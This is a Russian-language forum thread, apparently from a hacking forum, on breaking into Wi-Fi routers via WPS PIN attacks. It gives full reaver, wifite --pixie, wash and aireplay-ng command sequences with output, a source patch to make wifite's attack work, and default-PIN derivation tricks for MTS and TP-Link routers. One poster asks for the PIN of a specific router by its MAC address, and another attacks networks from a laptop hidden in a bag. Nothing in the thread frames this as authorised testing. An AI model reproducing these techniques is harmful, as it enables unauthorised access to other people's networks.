Тут еще нужно учитывать, что штыревая антенна имеет круговую направленность, т. е. точки, которые находятся над тобой и под тобой будут ловиться фигово. У меня этот эффект проявляется при использовании круговой на 9dBi. Т. е. точки, которые на других этажах в моем доме, лучше ловятся с маленькой антеннкой на 5dBi, а вот с антенной на 9dBi лучше ловятся только те точки, которые находятся на расстоянии по горизонтали. Я поначалу тоже не понимал, в чем дело, но сейчас ощущаю эффект от такой антенны, однако, направленная все равно будет лучше (но ее нужно правильно направлять).
Сразу не догнал. Есть тема по антеннам. Пишите там. Немного нагадили https://forum.antichat.ru/threads/80775/
Читал выше что ребята откопали новый алгоритм генерации пинов для многих роутеров. Считаю что нужно сообщить данную находку нашим испанским коллегам
Доброго дня! Подскажите пин на роутер netgear wnr2200 00:8e:f2:47:0d:ba . Dumpper подобрал первые 4 цифры - 2268, остальные не может найти
День добрый форумчане!Тут понадобился мне скрипт wifite.py для нескольких кинетиков. Но проблема возникла в том,что при скане точек с активным wps, выдаёт крайне мало точек. Запускаю так: sudo python wifite.py --wps --pixie В упор не видит моего подопытного зюкселя.В то время как wash видит всё. Пробовал ещё модскрипт wifite-ng.Сети видит все.Но опять таки атака pixie не идёт.Висит бесконечный Waiting..... Если запустить pixie напрямую,то всё пучком.Пин вычисляется. Вот засада!Чего можно предпринять?Напрямую запускать невариант.Так как ноут в сумке."Работать" надо по SSH с планшета. Набирать длинные команды жуть как не удобно.И скрипт бы тут очень помог. P.S. При атаке --wpa сети тоже видит все.Шейки ловит нормально.
https://github.com/derv82/wifite/blob/master/wifite.py попробуйте строчки 1811..1813 --- cmd = [program_name, '-f', cap_file, '-C'] # ignore Frame Check Sum errors --- заменить на: --- cmd = [program_name, '-f', cap_file] --- Авось поможет.
Снова вы вточку!Всё заработало как надо.Теперь и точки все видит.И атака идёт. Огромное спасибо! И у меня ещё вопрос есть. Где в скрипте можно задавать конкретные опции риверу.А то неизвестно с какими он запускается.С -a наверное. Я часто использую опцию -N.Помогает. Вот сейчас провёл эксперимент.Запустил reaver напрямую без -N. sudo reaver -i wlan2mon -b 40:4A:03:77:F3:F5 -vvv -K 1 (буксует на одном месте) А так: sudo reaver -i wlan2mon -b 40:4A:03:77:F3:F5 -vvv -K 1 -N Срабатывает почти сразу.
Запуск reaver вижу в двух местах, можно найти cmd = ['reaver', И добавить опциию cmd = ['reaver', '-N',
На волне с асусами, стал смотреть wps от роутеров 00:1F:CE:ХХ:ХХ:ХХ MTSRouter_хххххх, их впс пин это (24-bit PIN)-7. Например 59172550 | 24-bit PIN, а действительный пароль 59172543
Точнее, не 24_bit_PIN - 7, а 24_bit_PIN(BSSID-1). Последняя цифра - это контрольная сумма, так отнимать некорректно.
Если у ТП-Линка ESSID типа TP-LINK_65DE, попробуй поймать хендшейк и сбрутить 8 цифр. По умолчанию у них пароль=WPS, по крайней мере, мне таких немало попадалось.
Помогите запустить reaver на подбор пина плс. Имею: ноут со встроенным Wi-Fi, внешний USB-Wi-Fi на чипсете RT3070, KALI версия январь 2016 (загрузка KALI с флешки) Последовательность моих действий такова: 1. iwconfig (показывает что у меня действительно есть 2 wlan адаптера) 2. airmon-ng check kill (убиваю все лишнее) 3. root@kali:~# airmon-ng start wlan1 PHY Interface Driver Chipset phy0 wlan0 iwl3945 Intel Corporation PRO/Wireless 3945ABG [Golan] (rev 02) phy1 wlan1 rt2800usb Ralink Technology, Corp. RT2870/RT3070 (mac80211 monitor mode vif enabled for [phy1]wlan1 on [phy1]wlan1mon) (mac80211 station mode vif disabled for [phy1]wlan1) 4. airodump-ng wlan1mon (получаю список всех доступных точек доступа) 5. wash -i wlan1mon (так wash не работал, wash -i wlan1mon -C а так заработал) 6. root@kali:~# reaver -i wlan1mon -b 00:11:22:33:44:55 -c 1 -S -L -w Reaver v1.5.2 WiFi Protected Setup Attack Tool Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]> mod by t6_x <[email protected]> & DataHead & Soxrok2212 [+] Waiting for beacon from 00:11:22:33:44:55 [!] WARNING: Failed to associate with 00:11:22:33:44:55 (ESSID: abc) [!] WARNING: Failed to associate with 00:11:22:33:44:55 (ESSID: abc) [!] WARNING: Failed to associate with 00:11:22:33:44:55 (ESSID: abc) ^C (пробовал наугад задавать аргументы к reaver , но результат не менялся пока не наткнулся в инете на такой вариант(ниже)) reaver -i wlan1mon -c 6 -b 00:11:22:33:44:55 -v -v -A -vv получаю: [+] Switching wlan1mon to channel 6 [+] Waiting for beacon from 64:70:028:EE:0E [+] Associated with 64:70:028:EE:0E (ESSID: interzet373) [+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000 [+] Trying pin 12345670. [+] Sending EAPOL START request [!] WARNING: Receive timeout occurred [!] WARNING: 25 successive start failures [+] Sending EAPOL START request [+] Sending WSC NACK [!] WPS transaction failed (code: 0x02), re-trying last pin [+] Trying pin 12345670. [+] Sending EAPOL START request [!] WARNING: Receive timeout occurred [+] Sending EAPOL START request (это уже лучше смотрится, вроде хоть есть попытка отправить пин, только она длится вечно на одном месте) Сразу отмечу что сигнал сильный, подскажите плс возможные причины проблемы и варианты их устранения? как заставить reaver перебирать пины?
сначала в отдельном окне Code: aireplay-ng -1 100 -a [MAC] wlan0 потом в отдлельном окне Code: reaver -i wlan0 -b [MAC] -vv -c [channel] -aAwSNE
Ничего не получается, на шаге: Code: aireplay-ng -1 100 -a [MAC] wlan0 Все по порядку, делал так: 1. iwconfig 2. airmon-ng check kill 3. airmon-ng start wlan1 4. airodump-ng wlan1mon 5. wash -i wlan1mon -C 6. root@kali:~# aireplay-ng -1 100 -a 00:11:22:33:44:55 wlan1mon No source MAC (-h) specified. Using the device MAC (11:11:11:11:11:11) 17:57:14 Waiting for beacon frame (BSSID: 00:11:22:33:44:55) on channel 1 17:57:24 No such BSSID available. Please specify an ESSID (-e). (добавил название сети) root@kali:~# aireplay-ng -1 100 -a 00:11:22:33:44:55 -e abcNetwork wlan1mon No source MAC (-h) specified. Using the device MAC (11:11:11:11:11:11) 17:58:03 Waiting for beacon frame (BSSID: 00:11:22:33:44:55) on channel 1 17:58:13 No such BSSID available. (эта сеть находится на 6 канале, но aireplay-ng это не понимает) (выбрал другую точку на 1 канале) root@kali:~# aireplay-ng -1 100 -a 00:11:22:33:44:55 wlan1mon No source MAC (-h) specified. Using the device MAC (11:11:11:11:11:11) 17:49:38 Waiting for beacon frame (BSSID: 00:11:22:33:44:55) on channel 1 17:49:38 Sending Authentication Request (Open System) ... 17:50:08 Sending Authentication Request (Open System) Attack was unsuccessful. Possible reasons: * Perhaps MAC address filtering is enabled. * Check that the BSSID (-a option) is correct. * Try to change the number of packets (-o option). * The driver/card doesn't support injection. * This attack sometimes fails against some APs. * The card is not on the same channel as the AP. * You're too far from the AP. Get closer, or lower the transmit rate. 7. понимаю что уже нет смысла запускать reaver но все равно его запускаю в другом окне. reaver -i wlan1mon -b 00:11:22:33:44:55 -vv -c 1 -aAwSNE В результате все как и раньше, что делать?